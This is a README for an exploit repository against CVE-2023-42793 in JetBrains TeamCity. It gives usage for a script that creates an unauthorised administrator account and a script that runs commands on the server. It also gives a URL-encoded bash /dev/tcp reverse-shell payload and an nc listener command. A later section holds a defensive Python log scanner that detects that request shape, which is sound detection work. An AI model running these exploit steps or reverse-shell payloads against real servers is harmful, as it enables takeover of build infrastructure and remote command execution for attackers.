JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793

Zyad-Elsayed/CVE-2023-42793

CVE-2023-42793 - TeamCity Admin Account Creation Leads to RCE

Use exploit.py first to create an administrator account, then use rce.py to execute commands on the target. For a reverse shell, see the reverse shell example below.

Exploit Script

Description

This script exploits CVE-2023-42793 to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.

Usage

python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

Options

  • -u, --url URL: Target URL (required)
  • -v, --verbose: Enable verbose mode
  • -n, --username USERNAME: Specify username (default: random)
  • -p, --password PASSWORD: Specify password (default: random)
  • -e, --email EMAIL: Specify email (default: random)
  • -t, --token-file: File to save the token

Prerequisites

  • Python 3.x
  • Python libraries
    • To install the dependencies: pip3 install -r requirements.txt

Examples

  1. Exploit with random username, password, and email:

    python exploit.py -u http://target.com

  2. Exploit with specified username, password, and email:

    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]

Output

Upon successful exploitation, the script prints the URL, username, and password of the created admin account, then saves the output in the token file.

Remote Code Execution (RCE) Script

Description

This script allows executing commands on a vulnerable TeamCity server exploiting CVE-2023-42793. It first enables the debug processes and then executes the specified command using the appropriate API endpoints.

Usage

python rce.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

Options

  • -u, --url URL : Target URL (required)
  • -t, --token-file : Specify the file containing the token
  • -c, --command COMMAND: Specify command to execute (RCE)
  • -P, --port PORT: Specify port (default is 80)

Example

Exploit with a specified command:

python rce.py -u http://target.com -t token -c "whoami"

For reverse shell

python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • In this reverse shell command, replace {IP} with your IP and {port} with the port you are listening on
  • Create a listener using nc, for example: nc -nvlp 5555
  • For more, check revshells
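
On the defender's side, the request shape shown above (an interpreter followed by repeated `params=` values, with a URL-encoded `/dev/tcp/` redirect) can be hunted in web access logs. The following is an added example, not part of this repository: the log lines are constructed, and the request path and the `PLACEHOLDER_KEY` parameter name are placeholders because the page does not name them.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines. "/PLACEHOLDER/..." paths and PLACEHOLDER_KEY are
# stand-ins: the page does not name the endpoint or its first parameter.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /PLACEHOLDER/search?params=verbose&name=build HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:10:00:07 +0000] "POST /PLACEHOLDER/endpoint?PLACEHOLDER_KEY=%22/bin/bash%22&params=%22-c%22&params=%22sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.0.2.10%2F5555%200%3E%261%22 HTTP/1.1" 200 87
198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "POST /PLACEHOLDER/endpoint?PLACEHOLDER_KEY=%252Fbin%252Fsh&params=-c&params=id HTTP/1.1" 500 40
"""

LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|PUT|DELETE) (\S+) [^"]*" (\d{3})')
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}


def inspect_request(target):
    """Return the reasons a request target looks like command execution."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    # parse_qsl decodes once; decode again to catch double-encoding,
    # then drop the wrapping quotes the page's example sends.
    pairs = [(k, unquote(v).strip("\"'")) for k, v in pairs]
    args = [v for k, v in pairs if k == "params"]
    reasons = []
    # An interpreter path in one parameter plus argument values in "params".
    if args and any(re.split(r"[\\/]", v)[-1].lower() in SHELLS
                    for k, v in pairs if k != "params"):
        reasons.append("shell-with-params")
    # Bash network redirection, the core of the reverse shell one-liner.
    if any("/dev/tcp/" in v for _, v in pairs):
        reasons.append("dev-tcp-redirect")
    return reasons


def scan(log_text):
    """Return (client_ip, http_status, reasons) for each suspicious log line."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m.group(2))
        if reasons:
            findings.append((m.group(1), int(m.group(3)), reasons))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A bare command such as the `whoami` example carries no `params` values and is not flagged by query shape alone, so a production rule should also match on the request path of the command-execution endpoint.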

Notes

  • This script has been tested on Runner.htb from Hack The Box
  • This script is for educational purposes only.
  • Use it responsibly and only on systems you are authorized to test.

Credits

Resources